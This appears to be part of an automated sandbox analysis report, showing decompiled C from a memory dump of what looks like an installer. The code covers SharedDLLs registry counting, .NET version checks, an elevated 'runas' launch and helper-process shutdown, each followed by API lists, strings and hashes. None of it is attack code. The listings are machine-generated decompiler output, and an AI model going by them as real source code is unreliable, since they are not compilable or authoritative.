				_t168 = E005C7A14(_t77, L"Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs", 0x80000002,  &_v20, 3, 0);
				if(_t168 == 2) {
					L30:
					_pop(_t189);
					 *[fs:eax] = _t189;
					_push(E0060E7C5);
					E0040A228( &_v80, 2);
					E0040A228( &_v60, 2);
					E0040A228( &_v44, 2);
					return E0040A1C8( &_v8);
				} else {
					if(_t168 != 0) {
						E0060CF98(0x80000002,  &_v56, _t207);
						_v52 = _v56;
						_v48 = L"Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs";
						E005CD4D8(0x52, 1,  &_v52,  &_v44);
						_push(_v44);
						_push(L"\r\n\r\n");
						_v72 = L"RegOpenKeyEx";
						E00423004(_t168,  &_v76);
						_v68 = _v76;
						E005C857C(_t168,  &_v80);
						_v64 = _v80;
						E005CD4D8(0x48, 2,  &_v72,  &_v60);
						_push(_v60);
						E0040B550( &_v40, _t168, 3, __edi, __esi);
						E00429008(_v40, 1);
						E004098C4();
					}
					_push(_t207);
					_push(0x60e77a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t209;
					_t169 = E0040B278(_v12);
					if(RegQueryValueExW(_v20, _t169, 0,  &_v32, 0,  &_v36) == 0) {
						_v21 = 0;
						_v28 = 0;
						_push(_t207);
						_push(0x60e6b8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t209;
						_t98 = _v32 - 1;
						__eflags = _t98;
						if(_t98 == 0) {
							__eflags = E005C793C();
							if(__eflags != 0) {
								_v28 = E0042339C(_v8, __eflags);
								_v21 = 1;
							}
						} else {
							_t133 = _t98 - 2;
							__eflags = _t133;
							if(_t133 == 0) {
								__eflags = _v36 - 1;
								if(_v36 >= 1) {
									__eflags = _v36 - 4;
									if(_v36 <= 4) {
										_t139 = RegQueryValueExW(_v20, E0040B278(_v12), 0, 0,  &_v28,  &_v36);
										__eflags = _t139;
										if(_t139 == 0) {
											_v21 = 1;
										}
									}
								}
							} else {
								__eflags = _t133 == 1;
								if(_t133 == 1) {
									_v36 = 4;
									_t144 = RegQueryValueExW(_v20, _t169, 0, 0,  &_v28,  &_v36);
									__eflags = _t144;
									if(_t144 == 0) {
										_v21 = 1;
									}
								}
							}
						}
						_pop(_t194);
						 *[fs:eax] = _t194;
						__eflags = _v21;
						if(_v21 != 0) {
							_v28 = _v28 - 1;
							__eflags = _v28;
							if(_v28 > 0) {
								_t103 = _v32 - 1;
								__eflags = _t103;
								if(_t103 == 0) {
									E0042302C( &_v8, _v28, 0);
									_t170 = _v8;
									__eflags = _t170;
									if(_t170 != 0) {
										_t172 = _t170 - 4;
										__eflags = _t172;
										_t170 =  *_t172;
									}
									_t110 = E0040B278(_v8);
									RegSetValueExW(_v20, E0040B278(_v12), 0, 1, _t110, _t170 + 1 + _t170 + 1);
								} else {
									__eflags = _t103 + 0xfffffffe - 2;
									if(_t103 + 0xfffffffe - 2 < 0) {
										RegSetValueExW(_v20, E0040B278(_v12), 0, _v32,  &_v28, 4);
									}
								}
							} else {
								_v13 = 1;
								RegDeleteValueW(_v20, E0040B278(_v12));
							}
							__eflags = 0;
							_pop(_t196);
							 *[fs:eax] = _t196;
							_push(E0060E781);
							return RegCloseKey(_v20);
						} else {
							E004099B8();
							goto L30;
						}
					} else {
						E004099B8();
						goto L30;
					}
				}
			}







































                                                            0x0060e4d9
                                                            0x0060e4db
                                                            0x0060e4df
                                                            0x0060e4e0
                                                            0x0060e4e3
                                                            0x0060e4e6
                                                            0x0060e4e9
                                                            0x0060e4ec
                                                            0x0060e4ef
                                                            0x0060e4f2
                                                            0x0060e4f5
                                                            0x0060e4f8
                                                            0x0060e4fd
                                                            0x0060e4fe
                                                            0x0060e503
                                                            0x0060e506
                                                            0x0060e509
                                                            0x0060e524
                                                            0x0060e529
                                                            0x0060e781
                                                            0x0060e783
                                                            0x0060e786
                                                            0x0060e789
                                                            0x0060e796
                                                            0x0060e7a3
                                                            0x0060e7b0
                                                            0x0060e7bd
                                                            0x0060e52f
                                                            0x0060e531
                                                            0x0060e543
                                                            0x0060e54b
                                                            0x0060e553
                                                            0x0060e562
                                                            0x0060e567
                                                            0x0060e56a
                                                            0x0060e578
                                                            0x0060e580
                                                            0x0060e588
                                                            0x0060e590
                                                            0x0060e598
                                                            0x0060e5a7
                                                            0x0060e5ac
                                                            0x0060e5b7
                                                            0x0060e5c6
                                                            0x0060e5cb
                                                            0x0060e5cb
                                                            0x0060e5d2
                                                            0x0060e5d3
                                                            0x0060e5d8
                                                            0x0060e5db
                                                            0x0060e5f2
                                                            0x0060e600
                                                            0x0060e60c
                                                            0x0060e612
                                                            0x0060e617
                                                            0x0060e618
                                                            0x0060e61d
                                                            0x0060e620
                                                            0x0060e626
                                                            0x0060e626
                                                            0x0060e627
                                                            0x0060e640
                                                            0x0060e642
                                                            0x0060e64c
                                                            0x0060e64f
                                                            0x0060e64f
                                                            0x0060e629
                                                            0x0060e629
                                                            0x0060e629
                                                            0x0060e62c
                                                            0x0060e655
                                                            0x0060e659
                                                            0x0060e65b
                                                            0x0060e65f
                                                            0x0060e67a
                                                            0x0060e67f
                                                            0x0060e681
                                                            0x0060e683
                                                            0x0060e683
                                                            0x0060e681
                                                            0x0060e65f
                                                            0x0060e62e
                                                            0x0060e62e
                                                            0x0060e62f
                                                            0x0060e689
                                                            0x0060e6a1
                                                            0x0060e6a6
                                                            0x0060e6a8
                                                            0x0060e6aa
                                                            0x0060e6aa
                                                            0x0060e6a8
                                                            0x0060e62f
                                                            0x0060e62c
                                                            0x0060e6b0
                                                            0x0060e6b3
                                                            0x0060e6c2
                                                            0x0060e6c6
                                                            0x0060e6d2
                                                            0x0060e6d5
                                                            0x0060e6d9
                                                            0x0060e6f6
                                                            0x0060e6f6
                                                            0x0060e6f7
                                                            0x0060e70d
                                                            0x0060e712
                                                            0x0060e715
                                                            0x0060e717
                                                            0x0060e719
                                                            0x0060e719
                                                            0x0060e71c
                                                            0x0060e71c
                                                            0x0060e727
                                                            0x0060e73e
                                                            0x0060e6f9
                                                            0x0060e6fc
                                                            0x0060e6ff
                                                            0x0060e75e
                                                            0x0060e75e
                                                            0x0060e6ff
                                                            0x0060e6db
                                                            0x0060e6db
                                                            0x0060e6ec
                                                            0x0060e6ec
                                                            0x0060e763
                                                            0x0060e765
                                                            0x0060e768
                                                            0x0060e76b
                                                            0x0060e779
                                                            0x0060e6c8
                                                            0x0060e6c8
                                                            0x00000000
                                                            0x0060e6c8
                                                            0x0060e602
                                                            0x0060e602
                                                            0x00000000
                                                            0x0060e602
                                                            0x0060e600

                                                            APIs
                                                              • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,0060E77A,?,?,00000003,00000000,00000000,0060E7BE), ref: 0060E5F9
                                                              • Part of subcall function 005C857C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,0060E6B8,?,?,00000000,00000000,?,00000000,?,00000000), ref: 0060E67A
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,0060E6B8,?,?,00000000,00000000,?,00000000,?,00000000), ref: 0060E6A1
                                                            Strings
                                                            • RegOpenKeyEx, xrefs: 0060E573
                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0060E54E
                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0060E515
                                                            • , xrefs: 0060E56A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: QueryValue$FormatMessageOpen
                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                            • API String ID: 2812809588-1577016196
                                                            • Opcode ID: c935babc025dfde1231f0ed7150034372abcde662798295f1ed62f2a300e3225
                                                            • Instruction ID: f3c5cbb3acae1969306396449b745ae43344fa58bfe099d55e14c7ecbf00227c
                                                            • Opcode Fuzzy Hash: c935babc025dfde1231f0ed7150034372abcde662798295f1ed62f2a300e3225
                                                            • Instruction Fuzzy Hash: C7919270E84219AFDB04DFA5D885BEFBBBAEB48304F14482AF500E72C1D7769945CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0062709C, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 162registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 84%
                                                            			E0062709C(signed int __eax, void* __ebx, signed int __edx, void* __edi, void* __esi) {
				signed int _v5;
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* __ecx;
				void* _t79;
				signed int _t83;
				signed char _t125;
				intOrPtr _t127;
				intOrPtr _t156;
				signed int _t170;
				intOrPtr _t178;
				intOrPtr _t180;
				intOrPtr _t181;

				_t180 = _t181;
				_t127 = 4;
				do {
					_push(0);
					_push(0);
					_t127 = _t127 - 1;
				} while (_t127 != 0);
				_t1 =  &_v8;
				_t128 =  *_t1;
				 *_t1 = _t127;
				_t178 =  *_t1;
				_v5 = __edx;
				_t125 = __eax;
				_push(_t180);
				_push(0x6272a5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t181;
				if( *((intOrPtr*)(0x6d6380 + ((__eax & 0x000000ff) + (__eax & 0x000000ff)) * 8 + (_v5 & 0x000000ff) * 4)) != 0) {
					L18:
					E0040A5A8(_t178,  *((intOrPtr*)(0x6d6380 + ((_t125 & 0x000000ff) + (_t125 & 0x000000ff)) * 8 + (_v5 & 0x000000ff) * 4)));
					_pop(_t156);
					 *[fs:eax] = _t156;
					_push(E006272AC);
					return E0040A228( &_v32, 5);
				}
				E00626F48(__eax, _t128,  &_v16, _t180);
				if((_v5 & 0x000000ff) + 0xfe - 2 >= 0 || E005C7A14(_t125, L"SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v4.0", 0x80000002,  &_v12, 1, 0) != 0) {
					_t79 = (_v5 & 0x000000ff) - 1;
					if(_t79 == 0 || _t79 == 2) {
						if(E005C7A14(_t125, L"SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v2.0", 0x80000002,  &_v12, 1, 0) != 0) {
							goto L10;
						} else {
							_t174 = _t125 & 0x0000007f;
							E005C4EA4( *((intOrPtr*)(0x6d6374 + (_t125 & 0x0000007f) * 4)),  &_v24);
							E0040B4C8(0x6d6380 + (_t174 + _t174) * 8 + (_v5 & 0x000000ff) * 4, L"v2.0.50727", _v24);
							RegCloseKey(_v12);
							goto L14;
						}
					} else {
						L10:
						_t83 = _v5 & 0x000000ff;
						if(_t83 == 0 || _t83 == 3) {
							if(E005C7A14(_t125, L"SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v1.1", 0x80000002,  &_v12, 1, 0) == 0) {
								_t172 = _t125 & 0x0000007f;
								E005C4EA4( *((intOrPtr*)(0x6d6374 + (_t125 & 0x0000007f) * 4)),  &_v28);
								E0040B4C8(0x6d6380 + (_t172 + _t172) * 8 + (_v5 & 0x000000ff) * 4, L"v1.1.4322", _v28);
								RegCloseKey(_v12);
							}
						}
						goto L14;
					}
				} else {
					_t176 = _t125 & 0x0000007f;
					E005C4EA4( *((intOrPtr*)(0x6d6374 + (_t125 & 0x0000007f) * 4)),  &_v20);
					E0040B4C8(0x6d6380 + (_t176 + _t176) * 8 + (_v5 & 0x000000ff) * 4, L"v4.0.30319", _v20);
					RegCloseKey(_v12);
					L14:
					_t170 = _v5 & 0x000000ff;
					if( *((intOrPtr*)(0x6d6380 + ((_t125 & 0x000000ff) + (_t125 & 0x000000ff)) * 8 + _t170 * 4)) == 0) {
						if(_v5 == 3) {
							E0060CD28(L".NET Framework not found", _t125);
						} else {
							_v40 =  *((intOrPtr*)(0x6cd0a4 + _t170 * 4));
							_v36 = 0x11;
							E004244F8(L".NET Framework version %s not found", 0,  &_v40,  &_v32);
							E0060CD28(_v32, _t125);
						}
					}
					goto L18;
				}
			}























                                                            0x0062709d
                                                            0x006270a0
                                                            0x006270a5
                                                            0x006270a5
                                                            0x006270a7
                                                            0x006270a9
                                                            0x006270a9
                                                            0x006270ac
                                                            0x006270ac
                                                            0x006270ac
                                                            0x006270b2
                                                            0x006270b4
                                                            0x006270b7
                                                            0x006270bb
                                                            0x006270bc
                                                            0x006270c1
                                                            0x006270c4
                                                            0x006270db
                                                            0x00627270
                                                            0x00627285
                                                            0x0062728c
                                                            0x0062728f
                                                            0x00627292
                                                            0x006272a4
                                                            0x006272a4
                                                            0x006270e6
                                                            0x006270f3
                                                            0x00627157
                                                            0x00627159
                                                            0x0062717a
                                                            0x00000000
                                                            0x0062717c
                                                            0x00627181
                                                            0x0062718b
                                                            0x006271aa
                                                            0x006271b3
                                                            0x00000000
                                                            0x006271b3
                                                            0x006271ba
                                                            0x006271ba
                                                            0x006271ba
                                                            0x006271c0
                                                            0x006271e1
                                                            0x006271e8
                                                            0x006271f2
                                                            0x00627211
                                                            0x0062721a
                                                            0x0062721a
                                                            0x006271e1
                                                            0x00000000
                                                            0x006271c0
                                                            0x00627112
                                                            0x00627117
                                                            0x00627121
                                                            0x00627140
                                                            0x00627149
                                                            0x0062721f
                                                            0x0062721f
                                                            0x00627233
                                                            0x00627239
                                                            0x0062726b
                                                            0x0062723b
                                                            0x00627246
                                                            0x00627249
                                                            0x00627257
                                                            0x0062725f
                                                            0x0062725f
                                                            0x00627239
                                                            0x00000000
                                                            0x00627233

                                                            APIs
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,006272A5,?,00626DA0,?,00000000,00000000,00000000,?,?,00627510,00000000), ref: 00627149
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,006272A5,?,00626DA0,?,00000000,00000000,00000000,?,?,00627510,00000000), ref: 006271B3
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,00000001,00000000,00000000,006272A5,?,00626DA0,?,00000000,00000000,00000000,?), ref: 0062721A
                                                            Strings
                                                            • v4.0.30319, xrefs: 0062713B
                                                            • v1.1.4322, xrefs: 0062720C
                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 006270FF
                                                            • .NET Framework version %s not found, xrefs: 00627252
                                                            • .NET Framework not found, xrefs: 00627266
                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00627169
                                                            • v2.0.50727, xrefs: 006271A5
                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 006271D0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                            • API String ID: 3535843008-446240816
                                                            • Opcode ID: e0941211630b040962ad433e1c7d93649d8e46d21326bdffa5a487f6456e7331
                                                            • Instruction ID: 6a27bfdae97b75501bbdc0cce0dcd9b9ee0f65bcede85a7be403583e7914197f
                                                            • Opcode Fuzzy Hash: e0941211630b040962ad433e1c7d93649d8e46d21326bdffa5a487f6456e7331
                                                            • Instruction Fuzzy Hash: 8551E131A091699FCF04DBA8E861FFD7BB7EF45300F1504AAF500A7392D639AB058B21
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006A60E8, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 79%
                                                            			E006A60E8(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				DWORD* _v16;
				struct _SHELLEXECUTEINFOW _v76;
				long _t41;
				intOrPtr _t69;
				void* _t71;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t73 = _t74;
				_t75 = _t74 + 0xffffffb8;
				_v8 = 0;
				_v12 = 0;
				_v16 = __ecx;
				_t71 = __edx;
				_t60 = __eax;
				_push(_t73);
				_push(0x6a6237);
				 *[fs:eax] = _t75;
				E006A5F04(__eax,  &_v8,  *[fs:eax]);
				E006A6014( &_v12, _t60, _t71);
				E00407760( &_v76, 0x3c);
				_v76.cbSize = 0x3c;
				_v76.fMask = 0x800540;
				_v76.lpVerb = L"runas";
				_v76.lpFile = E0040B278(_v8);
				_v76.lpParameters = E0040B278(_t71);
				_v76.lpDirectory = E0040B278(_v12);
				_v76.nShow = 1;
				if(ShellExecuteExW( &_v76) == 0) {
					if(GetLastError() == 0x4c7) {
						E00428FDC();
					}
					E0060CE84(L"ShellExecuteEx");
				}
				if(_v76.hProcess == 0) {
					E0060CD28(L"ShellExecuteEx returned hProcess=0", _t60);
				}
				_push(_t73);
				_push(0x6a6215);
				_push( *[fs:edx]);
				 *[fs:edx] = _t75;
				do {
					E006A5C10();
					_t41 = MsgWaitForMultipleObjects(1,  &(_v76.hProcess), 0, 0xffffffff, 0x4ff);
				} while (_t41 == 1);
				if(_t41 == 0xffffffff) {
					E0060CE84(L"MsgWaitForMultipleObjects");
				}
				E006A5C10();
				if(GetExitCodeProcess(_v76.hProcess, _v16) == 0) {
					E0060CE84(L"GetExitCodeProcess");
				}
				_pop(_t69);
				 *[fs:eax] = _t69;
				_push(E006A621C);
				return CloseHandle(_v76.hProcess);
			}













                                                            0x006a60e9
                                                            0x006a60eb
                                                            0x006a60f2
                                                            0x006a60f5
                                                            0x006a60f8
                                                            0x006a60fb
                                                            0x006a60fd
                                                            0x006a6101
                                                            0x006a6102
                                                            0x006a610a
                                                            0x006a6112
                                                            0x006a611a
                                                            0x006a6129
                                                            0x006a612e
                                                            0x006a6135
                                                            0x006a6141
                                                            0x006a614c
                                                            0x006a6156
                                                            0x006a6161
                                                            0x006a6164
                                                            0x006a6176
                                                            0x006a6182
                                                            0x006a6184
                                                            0x006a6184
                                                            0x006a618e
                                                            0x006a618e
                                                            0x006a6197
                                                            0x006a619e
                                                            0x006a619e
                                                            0x006a61a5
                                                            0x006a61a6
                                                            0x006a61ab
                                                            0x006a61ae
                                                            0x006a61b1
                                                            0x006a61b1
                                                            0x006a61c5
                                                            0x006a61ca
                                                            0x006a61d2
                                                            0x006a61d9
                                                            0x006a61d9
                                                            0x006a61de
                                                            0x006a61f2
                                                            0x006a61f9
                                                            0x006a61f9
                                                            0x006a6200
                                                            0x006a6203
                                                            0x006a6206
                                                            0x006a6214

                                                            APIs
                                                              • Part of subcall function 006A5F04: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                              • Part of subcall function 006A5F04: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                              • Part of subcall function 006A5F04: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                              • Part of subcall function 006A5F04: CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                              • Part of subcall function 006A6014: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A60A5,?,00000097,00000000,?,006A611F,00000000,006A6237,?,?,00000001), ref: 006A6043
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 006A616F
                                                            • GetLastError.KERNEL32(0000003C,00000000,006A6237,?,?,00000001), ref: 006A6178
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006A61C5
                                                            • GetExitCodeProcess.KERNEL32 ref: 006A61EB
                                                            • CloseHandle.KERNEL32(00000000,006A621C,00000000,00000000,000000FF,000004FF,00000000,006A6215,?,0000003C,00000000,006A6237,?,?,00000001), ref: 006A620F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                            • API String ID: 254331816-221126205
                                                            • Opcode ID: 4b01546bb7c1e1f880d0074e3a62ab49537264529600a4ba05fbe354f8589c55
                                                            • Instruction ID: 3b593d6e4f6188ec2893085c4d8bc70e2010c955c7988aee54b7ca20d83eebf0
                                                            • Opcode Fuzzy Hash: 4b01546bb7c1e1f880d0074e3a62ab49537264529600a4ba05fbe354f8589c55
                                                            • Instruction Fuzzy Hash: 4931AF70A00208AFDB10FFE9C842A9DBABAEF06314F44053DF514E62D2D7789E448F29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00625D14, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00625D14(intOrPtr __eax, void* __edx) {
				long _v12;
				long _v16;
				void* __ebx;
				void* __esi;
				void* _t44;
				void* _t50;
				intOrPtr _t51;
				DWORD* _t52;

				_t19 = __eax;
				_t52 =  &_v12;
				_t44 = __edx;
				_t51 = __eax;
				if( *((char*)(__eax + 4)) == 0) {
					L11:
					return _t19;
				}
				 *((char*)(__eax + 5)) = 1;
				_v16 =  *((intOrPtr*)(__eax + 0x10));
				_v12 = 0;
				E006163B4(L"Stopping 64-bit helper process. (PID: %u)", __edx, 0,  &_v16, _t50, __eax);
				CloseHandle( *(_t51 + 0xc));
				 *(_t51 + 0xc) = 0;
				while(WaitForSingleObject( *(_t51 + 8), 0x2710) == 0x102) {
					E00616130(L"Helper isn\'t responding; killing it.", _t44, _t50, _t51);
					TerminateProcess( *(_t51 + 8), 1);
				}
				if(GetExitCodeProcess( *(_t51 + 8), _t52) == 0) {
					E00616130(L"Helper process exited, but failed to get exit code.", _t44, _t50, _t51);
				} else {
					if( *_t52 != 0) {
						_v16 =  *_t52;
						_v12 = 0;
						E006163B4(L"Helper process exited with failure code: 0x%x", _t44, 0,  &_v16, _t50, _t51);
					} else {
						E00616130(L"Helper process exited.", _t44, _t50, _t51);
					}
				}
				CloseHandle( *(_t51 + 8));
				 *(_t51 + 8) = 0;
				_t19 = 0;
				 *((intOrPtr*)(_t51 + 0x10)) = 0;
				 *((char*)(_t51 + 4)) = 0;
				if(_t44 == 0) {
					goto L11;
				} else {
					Sleep(0xfa);
					return 0;
				}
			}











                                                            0x00625d14
                                                            0x00625d16
                                                            0x00625d19
                                                            0x00625d1b
                                                            0x00625d21
                                                            0x00625df3
                                                            0x00625df3
                                                            0x00625df3
                                                            0x00625d27
                                                            0x00625d2e
                                                            0x00625d32
                                                            0x00625d42
                                                            0x00625d4b
                                                            0x00625d52
                                                            0x00625d6c
                                                            0x00625d5c
                                                            0x00625d67
                                                            0x00625d67
                                                            0x00625d8d
                                                            0x00625dc4
                                                            0x00625d8f
                                                            0x00625d93
                                                            0x00625da4
                                                            0x00625da8
                                                            0x00625db8
                                                            0x00625d95
                                                            0x00625d9a
                                                            0x00625d9a
                                                            0x00625d93
                                                            0x00625dcd
                                                            0x00625dd4
                                                            0x00625dd7
                                                            0x00625dd9
                                                            0x00625ddc
                                                            0x00625de2
                                                            0x00000000
                                                            0x00625de4
                                                            0x00625de9
                                                            0x00000000
                                                            0x00625de9

                                                            APIs
                                                            • CloseHandle.KERNEL32(?), ref: 00625D4B
                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625D67
                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625D75
                                                            • GetExitCodeProcess.KERNEL32 ref: 00625D86
                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DCD
                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DE9
                                                            Strings
                                                            • Helper process exited with failure code: 0x%x, xrefs: 00625DB3
                                                            • Helper isn't responding; killing it., xrefs: 00625D57
                                                            • Helper process exited, but failed to get exit code., xrefs: 00625DBF
                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00625D3D
                                                            • Helper process exited., xrefs: 00625D95
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                            • API String ID: 3355656108-1243109208
                                                            • Opcode ID: 39883d29d795098f418b7966fdcadf6d747d73cc4ff91dfa499128bca298669b
                                                            • Instruction ID: d564c8b30f574b505304bc0216fad519ef2dd9895e072bde183416e8b9fa8f35
                                                            • Opcode Fuzzy Hash: 39883d29d795098f418b7966fdcadf6d747d73cc4ff91dfa499128bca298669b
